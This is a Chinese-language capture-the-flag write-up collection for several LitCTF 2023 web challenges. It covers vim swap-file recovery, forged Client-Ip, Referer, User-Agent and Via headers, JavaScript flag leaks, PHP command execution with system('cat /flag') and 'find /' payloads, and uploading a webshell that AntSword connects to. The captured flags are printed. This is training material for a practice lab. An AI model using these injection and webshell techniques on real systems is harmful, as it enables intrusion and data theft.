litctf 2023
[LitCTF 2023]Vim yyds
访问:.index.php.swp
下载下来
恢复文件:
vim -r .index.php.swp
或者vi -r .index.php.swp
1 |
|
Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=
POST传入:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
NSSCTF{1c21591c-7690-47ee-8426-54f79824f06d}
[LitCTF 2023]Http pro max plus]
1.只允许本地访问 即需要伪造ip为本地ip伪装的方法 Client-Ip: 127.0.0.1 X-Forwarded-For: 127.0.0.1
使用xff方法无法通过
在请求头中加上Client-Ip: 127.0.0.1后通过
2.You are not from pornhub.com !(即伪造Referer)
加上Referer: pornhub.com后通过
3.用Chrome浏览器啊!(即伪造User-Agent)
加上User-Agent: Chrome 后通过
4.不开代理你想上p站?代理服务器地址是Clash.win(伪造Via)
加上Via: Clash.win后通过
借一步说话--->> /wtfwtfwtfwtf.php
查看源码,得到<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->
访问得到flag
[LitCTF 2023]导弹迷踪【js信息泄露】
查看源码,找到一个js文件夹
其内发现了:F|L|A|G {y0u_w1n_th1s_!!!}
text: function () {if (mLevel === 6) {return ‘GOT F|L|A|G {y0u_w1n_th1s_!!!}’;} else {return ‘CLICK TO CONTINUE’;}},
因此flag:F|L|A|G {y0u_w1n_th1s_!!!}
注意:提交的格式为NSSCTF{y0u_w1n_th1s_!!!}
[LitCTF 2023]PHP是世界上最好的语言!!【代码执行 getshell】
system(‘ls’);
system(‘pwd’);
system(‘find / -name flag*’);
system(‘cat /flag’);
//POWERFUL PHP TOOL
flag=NSSCTF{43fc5c29-e6b5-44f7-92d6-b2bef957a27c}
[LitCTF 2023]作业管理系统【创建文件 getshell】
admin/admin登录
创建文件:cc.php
蚁剑连接即可找到根目录的flag
flag=NSSCTF{959f0158-c22a-471b-8926-879171fae14c}
[LitCTF 2023]1zjs【js信息泄露】
查看源码,发现注释:/f@k3f1ag.php
PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php
访问:/f@k3f1ag.php 得到加密的flag
找到jsfuck进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}
NSSCTF{4b085016-8ace-4107-84d0-1da41ab108ba}